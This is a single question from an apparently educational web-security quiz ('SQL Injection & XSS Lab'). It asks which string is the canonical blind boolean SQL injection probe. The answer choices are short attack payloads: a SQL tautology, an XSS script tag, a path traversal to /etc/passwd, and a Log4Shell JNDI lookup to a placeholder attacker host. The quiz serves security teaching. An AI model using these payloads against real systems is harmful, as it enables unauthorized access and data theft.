provocativo
_
Blog
Incidents
Glossary
Labs
Quizzes
Tools
Arsenal
Certifications
Login
Live threats
Open feed
·
T
all quizzes
SQL Injection & XSS Lab
intermediate
Q1
/12
60s
Which payload is the canonical 'blind boolean' SQL injection probe against a login form?
1
' OR 1=1 --
2
<script>alert(1)</script>
3
../../../../etc/passwd
4
${jndi:ldap://evil.tld/x}